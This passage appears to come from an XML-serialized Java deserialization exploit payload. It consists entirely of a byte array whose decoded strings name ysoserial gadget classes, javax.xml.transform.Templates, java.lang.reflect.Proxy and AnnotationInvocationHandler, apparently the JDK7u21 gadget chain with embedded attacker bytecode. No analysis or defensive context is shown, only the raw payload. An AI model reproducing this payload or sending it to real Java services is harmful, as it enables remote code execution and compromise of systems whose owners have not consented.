index=\"4033\"><byte>70</byte></void><void index=\"4034\"><byte>0</byte></void><void index=\"4035\"><byte>9</byte></void><void index=\"4036\"><byte>3</byte></void><void index=\"4037\"><byte>-1</byte></void><void index=\"4038\"><byte>0</byte></void><void index=\"4039\"><byte>109</byte></void><void index=\"4040\"><byte>0</byte></void><void index=\"4041\"><byte>6</byte></void><void index=\"4042\"><byte>0</byte></void><void index=\"4043\"><byte>5</byte></void><void index=\"4044\"><byte>7</byte></void><void index=\"4045\"><byte>0</byte></void><void index=\"4046\"><byte>112</byte></void><void index=\"4047\"><byte>7</byte></void><void index=\"4048\"><byte>0</byte></void><void index=\"4049\"><byte>69</byte></void><void index=\"4050\"><byte>7</byte></void><void index=\"4051\"><byte>0</byte></void><void index=\"4052\"><byte>96</byte></void><void index=\"4053\"><byte>7</byte></void><void index=\"4054\"><byte>0</byte></void><void index=\"4055\"><byte>112</byte></void><void index=\"4056\"><byte>0</byte></void><void index=\"4057\"><byte>0</byte></void><void index=\"4058\"><byte>2</byte></void><void index=\"4059\"><byte>29</byte></void><void index=\"4060\"><byte>-4</byte></void><void index=\"4061\"><byte>0</byte></void><void index=\"4062\"><byte>26</byte></void><void index=\"4063\"><byte>7</byte></void><void index=\"4064\"><byte>0</byte></void><void index=\"4065\"><byte>-115</byte></void><void index=\"4066\"><byte>-2</byte></void><void index=\"4067\"><byte>0</byte></void><void index=\"4068\"><byte>32</byte></void><void index=\"4069\"><byte>7</byte></void><void index=\"4070\"><byte>0</byte></void><void index=\"4071\"><byte>-119</byte></void><void index=\"4072\"><byte>7</byte></void><void index=\"4073\"><byte>0</byte></void><void index=\"4074\"><byte>112</byte></void><void index=\"4075\"><byte>7</byte></void><void index=\"4076\"><byte>0</byte></void><void index=\"4077\"><byte>112</byte></void><void index=\"4078\"><byte>21</byte></void><void index=\"4079\"><byte>-1</byte></void><void index=\"4080\"><byte>0</byte></void><void index=\"4081\"><byte>23</byte></void><void index=\"4082\"><byte>0</byte></void><void index=\"4083\"><byte>6</byte></void><void index=\"4084\"><byte>0</byte></void><void index=\"4085\"><byte>5</byte></void><void index=\"4086\"><byte>7</byte></void><void index=\"4087\"><byte>0</byte></void><void index=\"4088\"><byte>112</byte></void><void index=\"4089\"><byte>7</byte></void><void index=\"4090\"><byte>0</byte></void><void index=\"4091\"><byte>69</byte></void><void index=\"4092\"><byte>7</byte></void><void index=\"4093\"><byte>0</byte></void><void index=\"4094\"><byte>96</byte></void><void index=\"4095\"><byte>7</byte></void><void index=\"4096\"><byte>0</byte></void><void index=\"4097\"><byte>112</byte></void><void index=\"4098\"><byte>0</byte></void><void index=\"4099\"><byte>1</byte></void><void index=\"4100\"><byte>7</byte></void><void index=\"4101\"><byte>0</byte></void><void index=\"4102\"><byte>-89</byte></void><void index=\"4103\"><byte>20</byte></void><void index=\"4104\"><byte>0</byte></void><void index=\"4105\"><byte>2</byte></void><void index=\"4106\"><byte>0</byte></void><void index=\"4107\"><byte>32</byte></void><void index=\"4108\"><byte>0</byte></void><void index=\"4109\"><byte>0</byte></void><void index=\"4110\"><byte>0</byte></void><void index=\"4111\"><byte>2</byte></void><void index=\"4112\"><byte>0</byte></void><void index=\"4113\"><byte>33</byte></void><void index=\"4114\"><byte>0</byte></void><void index=\"4115\"><byte>17</byte></void><void index=\"4116\"><byte>0</byte></void><void index=\"4117\"><byte>0</byte></void><void index=\"4118\"><byte>0</byte></void><void index=\"4119\"><byte>10</byte></void><void index=\"4120\"><byte>0</byte></void><void index=\"4121\"><byte>1</byte></void><void index=\"4122\"><byte>0</byte></void><void index=\"4123\"><byte>2</byte></void><void index=\"4124\"><byte>0</byte></void><void index=\"4125\"><byte>35</byte></void><void index=\"4126\"><byte>0</byte></void><void index=\"4127\"><byte>16</byte></void><void index=\"4128\"><byte>0</byte></void><void index=\"4129\"><byte>9</byte></void><void index=\"4130\"><byte>117</byte></void><void index=\"4131\"><byte>113</byte></void><void index=\"4132\"><byte>0</byte></void><void index=\"4133\"><byte>126</byte></void><void index=\"4134\"><byte>0</byte></void><void index=\"4135\"><byte>13</byte></void><void index=\"4136\"><byte>0</byte></void><void index=\"4137\"><byte>0</byte></void><void index=\"4138\"><byte>1</byte></void><void index=\"4139\"><byte>-44</byte></void><void index=\"4140\"><byte>-54</byte></void><void index=\"4141\"><byte>-2</byte></void><void index=\"4142\"><byte>-70</byte></void><void index=\"4143\"><byte>-66</byte></void><void index=\"4144\"><byte>0</byte></void><void index=\"4145\"><byte>0</byte></void><void index=\"4146\"><byte>0</byte></void><void index=\"4147\"><byte>50</byte></void><void index=\"4148\"><byte>0</byte></void><void index=\"4149\"><byte>27</byte></void><void index=\"4150\"><byte>10</byte></void><void index=\"4151\"><byte>0</byte></void><void index=\"4152\"><byte>3</byte></void><void index=\"4153\"><byte>0</byte></void><void index=\"4154\"><byte>21</byte></void><void index=\"4155\"><byte>7</byte></void><void index=\"4156\"><byte>0</byte></void><void index=\"4157\"><byte>23</byte></void><void index=\"4158\"><byte>7</byte></void><void index=\"4159\"><byte>0</byte></void><void index=\"4160\"><byte>24</byte></void><void index=\"4161\"><byte>7</byte></void><void index=\"4162\"><byte>0</byte></void><void index=\"4163\"><byte>25</byte></void><void index=\"4164\"><byte>1</byte></void><void index=\"4165\"><byte>0</byte></void><void index=\"4166\"><byte>16</byte></void><void index=\"4167\"><byte>115</byte></void><void index=\"4168\"><byte>101</byte></void><void index=\"4169\"><byte>114</byte></void><void index=\"4170\"><byte>105</byte></void><void index=\"4171\"><byte>97</byte></void><void index=\"4172\"><byte>108</byte></void><void index=\"4173\"><byte>86</byte></void><void index=\"4174\"><byte>101</byte></void><void index=\"4175\"><byte>114</byte></void><void index=\"4176\"><byte>115</byte></void><void index=\"4177\"><byte>105</byte></void><void index=\"4178\"><byte>111</byte></void><void index=\"4179\"><byte>110</byte></void><void index=\"4180\"><byte>85</byte></void><void index=\"4181\"><byte>73</byte></void><void index=\"4182\"><byte>68</byte></void><void index=\"4183\"><byte>1</byte></void><void index=\"4184\"><byte>0</byte></void><void index=\"4185\"><byte>1</byte></void><void index=\"4186\"><byte>74</byte></void><void index=\"4187\"><byte>1</byte></void><void index=\"4188\"><byte>0</byte></void><void index=\"4189\"><byte>13</byte></void><void index=\"4190\"><byte>67</byte></void><void index=\"4191\"><byte>111</byte></void><void index=\"4192\"><byte>110</byte></void><void index=\"4193\"><byte>115</byte></void><void index=\"4194\"><byte>116</byte></void><void index=\"4195\"><byte>97</byte></void><void index=\"4196\"><byte>110</byte></void><void index=\"4197\"><byte>116</byte></void><void index=\"4198\"><byte>86</byte></void><void index=\"4199\"><byte>97</byte></void><void index=\"4200\"><byte>108</byte></void><void index=\"4201\"><byte>117</byte></void><void index=\"4202\"><byte>101</byte></void><void index=\"4203\"><byte>5</byte></void><void index=\"4204\"><byte>113</byte></void><void index=\"4205\"><byte>-26</byte></void><void index=\"4206\"><byte>105</byte></void><void index=\"4207\"><byte>-18</byte></void><void index=\"4208\"><byte>60</byte></void><void index=\"4209\"><byte>109</byte></void><void index=\"4210\"><byte>71</byte></void><void index=\"4211\"><byte>24</byte></void><void index=\"4212\"><byte>1</byte></void><void index=\"4213\"><byte>0</byte></void><void index=\"4214\"><byte>6</byte></void><void index=\"4215\"><byte>60</byte></void><void index=\"4216\"><byte>105</byte></void><void index=\"4217\"><byte>110</byte></void><void index=\"4218\"><byte>105</byte></void><void index=\"4219\"><byte>116</byte></void><void index=\"4220\"><byte>62</byte></void><void index=\"4221\"><byte>1</byte></void><void index=\"4222\"><byte>0</byte></void><void index=\"4223\"><byte>3</byte></void><void index=\"4224\"><byte>40</byte></void><void index=\"4225\"><byte>41</byte></void><void index=\"4226\"><byte>86</byte></void><void index=\"4227\"><byte>1</byte></void><void index=\"4228\"><byte>0</byte></void><void index=\"4229\"><byte>4</byte></void><void index=\"4230\"><byte>67</byte></void><void index=\"4231\"><byte>111</byte></void><void index=\"4232\"><byte>100</byte></void><void index=\"4233\"><byte>101</byte></void><void index=\"4234\"><byte>1</byte></void><void index=\"4235\"><byte>0</byte></void><void index=\"4236\"><byte>15</byte></void><void index=\"4237\"><byte>76</byte></void><void index=\"4238\"><byte>105</byte></void><void index=\"4239\"><byte>110</byte></void><void index=\"4240\"><byte>101</byte></void><void index=\"4241\"><byte>78</byte></void><void index=\"4242\"><byte>117</byte></void><void index=\"4243\"><byte>109</byte></void><void index=\"4244\"><byte>98</byte></void><void index=\"4245\"><byte>101</byte></void><void index=\"4246\"><byte>114</byte></void><void index=\"4247\"><byte>84</byte></void><void index=\"4248\"><byte>97</byte></void><void index=\"4249\"><byte>98</byte></void><void index=\"4250\"><byte>108</byte></void><void index=\"4251\"><byte>101</byte></void><void index=\"4252\"><byte>1</byte></void><void index=\"4253\"><byte>0</byte></void><void index=\"4254\"><byte>18</byte></void><void index=\"4255\"><byte>76</byte></void><void index=\"4256\"><byte>111</byte></void><void index=\"4257\"><byte>99</byte></void><void index=\"4258\"><byte>97</byte></void><void index=\"4259\"><byte>108</byte></void><void index=\"4260\"><byte>86</byte></void><void index=\"4261\"><byte>97</byte></void><void index=\"4262\"><byte>114</byte></void><void index=\"4263\"><byte>105</byte></void><void index=\"4264\"><byte>97</byte></void><void index=\"4265\"><byte>98</byte></void><void index=\"4266\"><byte>108</byte></void><void index=\"4267\"><byte>101</byte></void><void index=\"4268\"><byte>84</byte></void><void index=\"4269\"><byte>97</byte></void><void index=\"4270\"><byte>98</byte></void><void index=\"4271\"><byte>108</byte></void><void index=\"4272\"><byte>101</byte></void><void index=\"4273\"><byte>1</byte></void><void index=\"4274\"><byte>0</byte></void><void index=\"4275\"><byte>4</byte></void><void index=\"4276\"><byte>116</byte></void><void index=\"4277\"><byte>104</byte></void><void index=\"4278\"><byte>105</byte></void><void index=\"4279\"><byte>115</byte></void><void index=\"4280\"><byte>1</byte></void><void index=\"4281\"><byte>0</byte></void><void index=\"4282\"><byte>3</byte></void><void index=\"4283\"><byte>70</byte></void><void index=\"4284\"><byte>111</byte></void><void index=\"4285\"><byte>111</byte></void><void index=\"4286\"><byte>1</byte></void><void index=\"4287\"><byte>0</byte></void><void index=\"4288\"><byte>12</byte></void><void index=\"4289\"><byte>73</byte></void><void index=\"4290\"><byte>110</byte></void><void index=\"4291\"><byte>110</byte></void><void index=\"4292\"><byte>101</byte></void><void index=\"4293\"><byte>114</byte></void><void index=\"4294\"><byte>67</byte></void><void index=\"4295\"><byte>108</byte></void><void index=\"4296\"><byte>97</byte></void><void index=\"4297\"><byte>115</byte></void><void index=\"4298\"><byte>115</byte></void><void index=\"4299\"><byte>101</byte></void><void index=\"4300\"><byte>115</byte></void><void index=\"4301\"><byte>1</byte></void><void index=\"4302\"><byte>0</byte></void><void index=\"4303\"><byte>37</byte></void><void index=\"4304\"><byte>76</byte></void><void index=\"4305\"><byte>121</byte></void><void index=\"4306\"><byte>115</byte></void><void index=\"4307\"><byte>111</byte></void><void index=\"4308\"><byte>115</byte></void><void index=\"4309\"><byte>101</byte></void><void index=\"4310\"><byte>114</byte></void><void index=\"4311\"><byte>105</byte></void><void index=\"4312\"><byte>97</byte></void><void index=\"4313\"><byte>108</byte></void><void index=\"4314\"><byte>47</byte></void><void index=\"4315\"><byte>112</byte></void><void index=\"4316\"><byte>97</byte></void><void index=\"4317\"><byte>121</byte></void><void index=\"4318\"><byte>108</byte></void><void index=\"4319\"><byte>111</byte></void><void index=\"4320\"><byte>97</byte></void><void index=\"4321\"><byte>100</byte></void><void index=\"4322\"><byte>115</byte></void><void index=\"4323\"><byte>47</byte></void><void index=\"4324\"><byte>117</byte></void><void index=\"4325\"><byte>116</byte></void><void index=\"4326\"><byte>105</byte></void><void index=\"4327\"><byte>108</byte></void><void index=\"4328\"><byte>47</byte></void><void index=\"4329\"><byte>71</byte></void><void index=\"4330\"><byte>97</byte></void><void index=\"4331\"><byte>100</byte></void><void index=\"4332\"><byte>103</byte></void><void index=\"4333\"><byte>101</byte></void><void index=\"4334\"><byte>116</byte></void><void index=\"4335\"><byte>115</byte></void><void index=\"4336\"><byte>36</byte></void><void index=\"4337\"><byte>70</byte></void><void index=\"4338\"><byte>111</byte></void><void index=\"4339\"><byte>111</byte></void><void index=\"4340\"><byte>59</byte></void><void index=\"4341\"><byte>1</byte></void><void index=\"4342\"><byte>0</byte></void><void index=\"4343\"><byte>10</byte></void><void index=\"4344\"><byte>83</byte></void><void index=\"4345\"><byte>111</byte></void><void index=\"4346\"><byte>117</byte></void><void index=\"4347\"><byte>114</byte></void><void index=\"4348\"><byte>99</byte></void><void index=\"4349\"><byte>101</byte></void><void index=\"4350\"><byte>70</byte></void><void index=\"4351\"><byte>105</byte></void><void index=\"4352\"><byte>108</byte></void><void index=\"4353\"><byte>101</byte></void><void index=\"4354\"><byte>1</byte></void><void index=\"4355\"><byte>0</byte></void><void index=\"4356\"><byte>12</byte></void><void index=\"4357\"><byte>71</byte></void><void index=\"4358\"><byte>97</byte></void><void index=\"4359\"><byte>100</byte></void><void index=\"4360\"><byte>103</byte></void><void index=\"4361\"><byte>101</byte></void><void index=\"4362\"><byte>116</byte></void><void index=\"4363\"><byte>115</byte></void><void index=\"4364\"><byte>46</byte></void><void index=\"4365\"><byte>106</byte></void><void index=\"4366\"><byte>97</byte></void><void index=\"4367\"><byte>118</byte></void><void index=\"4368\"><byte>97</byte></void><void index=\"4369\"><byte>12</byte></void><void index=\"4370\"><byte>0</byte></void><void index=\"4371\"><byte>10</byte></void><void index=\"4372\"><byte>0</byte></void><void index=\"4373\"><byte>11</byte></void><void index=\"4374\"><byte>7</byte></void><void index=\"4375\"><byte>0</byte></void><void index=\"4376\"><byte>26</byte></void><void index=\"4377\"><byte>1</byte></void><void index=\"4378\"><byte>0</byte></void><void index=\"4379\"><byte>35</byte></void><void index=\"4380\"><byte>121</byte></void><void index=\"4381\"><byte>115</byte></void><void index=\"4382\"><byte>111</byte></void><void index=\"4383\"><byte>115</byte></void><void index=\"4384\"><byte>101</byte></void><void index=\"4385\"><byte>114</byte></void><void index=\"4386\"><byte>105</byte></void><void index=\"4387\"><byte>97</byte></void><void index=\"4388\"><byte>108</byte></void><void index=\"4389\"><byte>47</byte></void><void index=\"4390\"><byte>112</byte></void><void index=\"4391\"><byte>97</byte></void><void index=\"4392\"><byte>121</byte></void><void index=\"4393\"><byte>108</byte></void><void index=\"4394\"><byte>111</byte></void><void index=\"4395\"><byte>97</byte></void><void index=\"4396\"><byte>100</byte></void><void index=\"4397\"><byte>115</byte></void><void index=\"4398\"><byte>47</byte></void><void index=\"4399\"><byte>117</byte></void><void index=\"4400\"><byte>116</byte></void><void index=\"4401\"><byte>105</byte></void><void index=\"4402\"><byte>108</byte></void><void index=\"4403\"><byte>47</byte></void><void index=\"4404\"><byte>71</byte></void><void index=\"4405\"><byte>97</byte></void><void index=\"4406\"><byte>100</byte></void><void index=\"4407\"><byte>103</byte></void><void index=\"4408\"><byte>101</byte></void><void index=\"4409\"><byte>116</byte></void><void index=\"4410\"><byte>115</byte></void><void index=\"4411\"><byte>36</byte></void><void index=\"4412\"><byte>70</byte></void><void index=\"4413\"><byte>111</byte></void><void index=\"4414\"><byte>111</byte></void><void index=\"4415\"><byte>1</byte></void><void index=\"4416\"><byte>0</byte></void><void index=\"4417\"><byte>16</byte></void><void index=\"4418\"><byte>106</byte></void><void index=\"4419\"><byte>97</byte></void><void index=\"4420\"><byte>118</byte></void><void index=\"4421\"><byte>97</byte></void><void index=\"4422\"><byte>47</byte></void><void index=\"4423\"><byte>108</byte></void><void index=\"4424\"><byte>97</byte></void><void index=\"4425\"><byte>110</byte></void><void index=\"4426\"><byte>103</byte></void><void index=\"4427\"><byte>47</byte></void><void index=\"4428\"><byte>79</byte></void><void index=\"4429\"><byte>98</byte></void><void index=\"4430\"><byte>106</byte></void><void index=\"4431\"><byte>101</byte></void><void index=\"4432\"><byte>99</byte></void><void index=\"4433\"><byte>116</byte></void><void index=\"4434\"><byte>1</byte></void><void index=\"4435\"><byte>0</byte></void><void index=\"4436\"><byte>20</byte></void><void index=\"4437\"><byte>106</byte></void><void index=\"4438\"><byte>97</byte></void><void index=\"4439\"><byte>118</byte></void><void index=\"4440\"><byte>97</byte></void><void index=\"4441\"><byte>47</byte></void><void index=\"4442\"><byte>105</byte></void><void index=\"4443\"><byte>111</byte></void><void index=\"4444\"><byte>47</byte></void><void index=\"4445\"><byte>83</byte></void><void index=\"4446\"><byte>101</byte></void><void index=\"4447\"><byte>114</byte></void><void index=\"4448\"><byte>105</byte></void><void index=\"4449\"><byte>97</byte></void><void index=\"4450\"><byte>108</byte></void><void index=\"4451\"><byte>105</byte></void><void index=\"4452\"><byte>122</byte></void><void index=\"4453\"><byte>97</byte></void><void index=\"4454\"><byte>98</byte></void><void index=\"4455\"><byte>108</byte></void><void index=\"4456\"><byte>101</byte></void><void index=\"4457\"><byte>1</byte></void><void index=\"4458\"><byte>0</byte></void><void index=\"4459\"><byte>31</byte></void><void index=\"4460\"><byte>121</byte></void><void index=\"4461\"><byte>115</byte></void><void index=\"4462\"><byte>111</byte></void><void index=\"4463\"><byte>115</byte></void><void index=\"4464\"><byte>101</byte></void><void index=\"4465\"><byte>114</byte></void><void index=\"4466\"><byte>105</byte></void><void index=\"4467\"><byte>97</byte></void><void index=\"4468\"><byte>108</byte></void><void index=\"4469\"><byte>47</byte></void><void index=\"4470\"><byte>112</byte></void><void index=\"4471\"><byte>97</byte></void><void index=\"4472\"><byte>121</byte></void><void index=\"4473\"><byte>108</byte></void><void index=\"4474\"><byte>111</byte></void><void index=\"4475\"><byte>97</byte></void><void index=\"4476\"><byte>100</byte></void><void index=\"4477\"><byte>115</byte></void><void index=\"4478\"><byte>47</byte></void><void index=\"4479\"><byte>117</byte></void><void index=\"4480\"><byte>116</byte></void><void index=\"4481\"><byte>105</byte></void><void index=\"4482\"><byte>108</byte></void><void index=\"4483\"><byte>47</byte></void><void index=\"4484\"><byte>71</byte></void><void index=\"4485\"><byte>97</byte></void><void index=\"4486\"><byte>100</byte></void><void index=\"4487\"><byte>103</byte></void><void index=\"4488\"><byte>101</byte></void><void index=\"4489\"><byte>116</byte></void><void index=\"4490\"><byte>115</byte></void><void index=\"4491\"><byte>0</byte></void><void index=\"4492\"><byte>33</byte></void><void index=\"4493\"><byte>0</byte></void><void index=\"4494\"><byte>2</byte></void><void index=\"4495\"><byte>0</byte></void><void index=\"4496\"><byte>3</byte></void><void index=\"4497\"><byte>0</byte></void><void index=\"4498\"><byte>1</byte></void><void index=\"4499\"><byte>0</byte></void><void index=\"4500\"><byte>4</byte></void><void index=\"4501\"><byte>0</byte></void><void index=\"4502\"><byte>1</byte></void><void index=\"4503\"><byte>0</byte></void><void index=\"4504\"><byte>26</byte></void><void index=\"4505\"><byte>0</byte></void><void index=\"4506\"><byte>5</byte></void><void index=\"4507\"><byte>0</byte></void><void index=\"4508\"><byte>6</byte></void><void index=\"4509\"><byte>0</byte></void><void index=\"4510\"><byte>1</byte></void><void index=\"4511\"><byte>0</byte></void><void index=\"4512\"><byte>7</byte></void><void index=\"4513\"><byte>0</byte></void><void index=\"4514\"><byte>0</byte></void><void index=\"4515\"><byte>0</byte></void><void index=\"4516\"><byte>2</byte></void><void index=\"4517\"><byte>0</byte></void><void index=\"4518\"><byte>8</byte></void><void index=\"4519\"><byte>0</byte></void><void index=\"4520\"><byte>1</byte></void><void index=\"4521\"><byte>0</byte></void><void index=\"4522\"><byte>1</byte></void><void index=\"4523\"><byte>0</byte></void><void index=\"4524\"><byte>10</byte></void><void index=\"4525\"><byte>0</byte></void><void index=\"4526\"><byte>11</byte></void><void index=\"4527\"><byte>0</byte></void><void index=\"4528\"><byte>1</byte></void><void index=\"4529\"><byte>0</byte></void><void index=\"4530\"><byte>12</byte></void><void index=\"4531\"><byte>0</byte></void><void index=\"4532\"><byte>0</byte></void><void index=\"4533\"><byte>0</byte></void><void index=\"4534\"><byte>47</byte></void><void index=\"4535\"><byte>0</byte></void><void index=\"4536\"><byte>1</byte></void><void index=\"4537\"><byte>0</byte></void><void index=\"4538\"><byte>1</byte></void><void index=\"4539\"><byte>0</byte></void><void index=\"4540\"><byte>0</byte></void><void index=\"4541\"><byte>0</byte></void><void index=\"4542\"><byte>5</byte></void><void index=\"4543\"><byte>42</byte></void><void index=\"4544\"><byte>-73</byte></void><void index=\"4545\"><byte>0</byte></void><void index=\"4546\"><byte>1</byte></void><void index=\"4547\"><byte>-79</byte></void><void index=\"4548\"><byte>0</byte></void><void index=\"4549\"><byte>0</byte></void><void index=\"4550\"><byte>0</byte></void><void index=\"4551\"><byte>2</byte></void><void index=\"4552\"><byte>0</byte></void><void index=\"4553\"><byte>13</byte></void><void index=\"4554\"><byte>0</byte></void><void index=\"4555\"><byte>0</byte></void><void index=\"4556\"><byte>0</byte></void><void index=\"4557\"><byte>6</byte></void><void index=\"4558\"><byte>0</byte></void><void index=\"4559\"><byte>1</byte></void><void index=\"4560\"><byte>0</byte></void><void index=\"4561\"><byte>0</byte></void><void index=\"4562\"><byte>0</byte></void><void index=\"4563\"><byte>60</byte></void><void index=\"4564\"><byte>0</byte></void><void index=\"4565\"><byte>14</byte></void><void index=\"4566\"><byte>0</byte></void><void index=\"4567\"><byte>0</byte></void><void index=\"4568\"><byte>0</byte></void><void index=\"4569\"><byte>12</byte></void><void index=\"4570\"><byte>0</byte></void><void index=\"4571\"><byte>1</byte></void><void index=\"4572\"><byte>0</byte></void><void index=\"4573\"><byte>0</byte></void><void index=\"4574\"><byte>0</byte></void><void index=\"4575\"><byte>5</byte></void><void index=\"4576\"><byte>0</byte></void><void index=\"4577\"><byte>15</byte></void><void index=\"4578\"><byte>0</byte></void><void index=\"4579\"><byte>18</byte></void><void index=\"4580\"><byte>0</byte></void><void index=\"4581\"><byte>0</byte></void><void index=\"4582\"><byte>0</byte></void><void index=\"4583\"><byte>2</byte></void><void index=\"4584\"><byte>0</byte></void><void index=\"4585\"><byte>19</byte></void><void index=\"4586\"><byte>0</byte></void><void index=\"4587\"><byte>0</byte></void><void index=\"4588\"><byte>0</byte></void><void index=\"4589\"><byte>2</byte></void><void index=\"4590\"><byte>0</byte></void><void index=\"4591\"><byte>20</byte></void><void index=\"4592\"><byte>0</byte></void><void index=\"4593\"><byte>17</byte></void><void index=\"4594\"><byte>0</byte></void><void index=\"4595\"><byte>0</byte></void><void index=\"4596\"><byte>0</byte></void><void index=\"4597\"><byte>10</byte></void><void index=\"4598\"><byte>0</byte></void><void index=\"4599\"><byte>1</byte></void><void index=\"4600\"><byte>0</byte></void><void index=\"4601\"><byte>2</byte></void><void index=\"4602\"><byte>0</byte></void><void index=\"4603\"><byte>22</byte></void><void index=\"4604\"><byte>0</byte></void><void index=\"4605\"><byte>16</byte></void><void index=\"4606\"><byte>0</byte></void><void index=\"4607\"><byte>9</byte></void><void index=\"4608\"><byte>112</byte></void><void index=\"4609\"><byte>116</byte></void><void index=\"4610\"><byte>0</byte></void><void index=\"4611\"><byte>4</byte></void><void index=\"4612\"><byte>80</byte></void><void index=\"4613\"><byte>119</byte></void><void index=\"4614\"><byte>110</byte></void><void index=\"4615\"><byte>114</byte></void><void index=\"4616\"><byte>112</byte></void><void index=\"4617\"><byte>119</byte></void><void index=\"4618\"><byte>1</byte></void><void index=\"4619\"><byte>0</byte></void><void index=\"4620\"><byte>120</byte></void><void index=\"4621\"><byte>115</byte></void><void index=\"4622\"><byte>125</byte></void><void index=\"4623\"><byte>0</byte></void><void index=\"4624\"><byte>0</byte></void><void index=\"4625\"><byte>0</byte></void><void index=\"4626\"><byte>1</byte></void><void index=\"4627\"><byte>0</byte></void><void index=\"4628\"><byte>29</byte></void><void index=\"4629\"><byte>106</byte></void><void index=\"4630\"><byte>97</byte></void><void index=\"4631\"><byte>118</byte></void><void index=\"4632\"><byte>97</byte></void><void index=\"4633\"><byte>120</byte></void><void index=\"4634\"><byte>46</byte></void><void index=\"4635\"><byte>120</byte></void><void index=\"4636\"><byte>109</byte></void><void index=\"4637\"><byte>108</byte></void><void index=\"4638\"><byte>46</byte></void><void index=\"4639\"><byte>116</byte></void><void index=\"4640\"><byte>114</byte></void><void index=\"4641\"><byte>97</byte></void><void index=\"4642\"><byte>110</byte></void><void index=\"4643\"><byte>115</byte></void><void index=\"4644\"><byte>102</byte></void><void index=\"4645\"><byte>111</byte></void><void index=\"4646\"><byte>114</byte></void><void index=\"4647\"><byte>109</byte></void><void index=\"4648\"><byte>46</byte></void><void index=\"4649\"><byte>84</byte></void><void index=\"4650\"><byte>101</byte></void><void index=\"4651\"><byte>109</byte></void><void index=\"4652\"><byte>112</byte></void><void index=\"4653\"><byte>108</byte></void><void index=\"4654\"><byte>97</byte></void><void index=\"4655\"><byte>116</byte></void><void index=\"4656\"><byte>101</byte></void><void index=\"4657\"><byte>115</byte></void><void index=\"4658\"><byte>120</byte></void><void index=\"4659\"><byte>114</byte></void><void index=\"4660\"><byte>0</byte></void><void index=\"4661\"><byte>23</byte></void><void index=\"4662\"><byte>106</byte></void><void index=\"4663\"><byte>97</byte></void><void index=\"4664\"><byte>118</byte></void><void index=\"4665\"><byte>97</byte></void><void index=\"4666\"><byte>46</byte></void><void index=\"4667\"><byte>108</byte></void><void index=\"4668\"><byte>97</byte></void><void index=\"4669\"><byte>110</byte></void><void index=\"4670\"><byte>103</byte></void><void index=\"4671\"><byte>46</byte></void><void index=\"4672\"><byte>114</byte></void><void index=\"4673\"><byte>101</byte></void><void index=\"4674\"><byte>102</byte></void><void index=\"4675\"><byte>108</byte></void><void index=\"4676\"><byte>101</byte></void><void index=\"4677\"><byte>99</byte></void><void index=\"4678\"><byte>116</byte></void><void index=\"4679\"><byte>46</byte></void><void index=\"4680\"><byte>80</byte></void><void index=\"4681\"><byte>114</byte></void><void index=\"4682\"><byte>111</byte></void><void index=\"4683\"><byte>120</byte></void><void index=\"4684\"><byte>121</byte></void><void index=\"4685\"><byte>-31</byte></void><void index=\"4686\"><byte>39</byte></void><void index=\"4687\"><byte>-38</byte></void><void index=\"4688\"><byte>32</byte></void><void index=\"4689\"><byte>-52</byte></void><void index=\"4690\"><byte>16</byte></void><void index=\"4691\"><byte>67</byte></void><void index=\"4692\"><byte>-53</byte></void><void index=\"4693\"><byte>2</byte></void><void index=\"4694\"><byte>0</byte></void><void index=\"4695\"><byte>1</byte></void><void index=\"4696\"><byte>76</byte></void><void index=\"4697\"><byte>0</byte></void><void index=\"4698\"><byte>1</byte></void><void index=\"4699\"><byte>104</byte></void><void index=\"4700\"><byte>116</byte></void><void index=\"4701\"><byte>0</byte></void><void index=\"4702\"><byte>37</byte></void><void index=\"4703\"><byte>76</byte></void><void index=\"4704\"><byte>106</byte></void><void index=\"4705\"><byte>97</byte></void><void index=\"4706\"><byte>118</byte></void><void index=\"4707\"><byte>97</byte></void><void index=\"4708\"><byte>47</byte></void><void index=\"4709\"><byte>108</byte></void><void index=\"4710\"><byte>97</byte></void><void index=\"4711\"><byte>110</byte></void><void index=\"4712\"><byte>103</byte></void><void index=\"4713\"><byte>47</byte></void><void index=\"4714\"><byte>114</byte></void><void index=\"4715\"><byte>101</byte></void><void index=\"4716\"><byte>102</byte></void><void index=\"4717\"><byte>108</byte></void><void index=\"4718\"><byte>101</byte></void><void index=\"4719\"><byte>99</byte></void><void index=\"4720\"><byte>116</byte></void><void index=\"4721\"><byte>47</byte></void><void index=\"4722\"><byte>73</byte></void><void index=\"4723\"><byte>110</byte></void><void index=\"4724\"><byte>118</byte></void><void index=\"4725\"><byte>111</byte></void><void index=\"4726\"><byte>99</byte></void><void index=\"4727\"><byte>97</byte></void><void index=\"4728\"><byte>116</byte></void><void index=\"4729\"><byte>105</byte></void><void index=\"4730\"><byte>111</byte></void><void index=\"4731\"><byte>110</byte></void><void index=\"4732\"><byte>72</byte></void><void index=\"4733\"><byte>97</byte></void><void index=\"4734\"><byte>110</byte></void><void index=\"4735\"><byte>100</byte></void><void index=\"4736\"><byte>108</byte></void><void index=\"4737\"><byte>101</byte></void><void index=\"4738\"><byte>114</byte></void><void index=\"4739\"><byte>59</byte></void><void index=\"4740\"><byte>120</byte></void><void index=\"4741\"><byte>112</byte></void><void index=\"4742\"><byte>115</byte></void><void index=\"4743\"><byte>114</byte></void><void index=\"4744\"><byte>0</byte></void><void index=\"4745\"><byte>50</byte></void><void index=\"4746\"><byte>115</byte></void><void index=\"4747\"><byte>117</byte></void><void index=\"4748\"><byte>110</byte></void><void index=\"4749\"><byte>46</byte></void><void index=\"4750\"><byte>114</byte></void><void index=\"4751\"><byte>101</byte></void><void index=\"4752\"><byte>102</byte></void><void index=\"4753\"><byte>108</byte></void><void index=\"4754\"><byte>101</byte></void><void index=\"4755\"><byte>99</byte></void><void index=\"4756\"><byte>116</byte></void><void index=\"4757\"><byte>46</byte></void><void index=\"4758\"><byte>97</byte></void><void index=\"4759\"><byte>110</byte></void><void index=\"4760\"><byte>110</byte></void><void index=\"4761\"><byte>111</byte></void><void index=\"4762\"><byte>116</byte></void><void index=\"4763\"><byte>97</byte></void><void index=\"4764\"><byte>116</byte></void><void index=\"4765\"><byte>105</byte></void><void index=\"4766\"><byte>111</byte></void><void index=\"4767\"><byte>110</byte></void><void index=\"4768\"><byte>46</byte></void><void index=\"4769\"><byte>65</byte></void><void index=\"4770\"><byte>110</byte></void><void index=\"4771\"><byte>110</byte></void><void index=\"4772\"><byte>111</byte></void><void index=\"4773\"><byte>116</byte></void><void index=\"4774\"><byte>97</byte></void><void index=\"4775\"><byte>116</byte></void><void index=\"4776\"><byte>105</byte></void><void index=\"4777\"><byte>111</byte></void><void index=\"4778\"><byte>110</byte></void><void index=\"4779\"><byte>73</byte></void><void index=\"4780\"><byte>110</byte></void><void 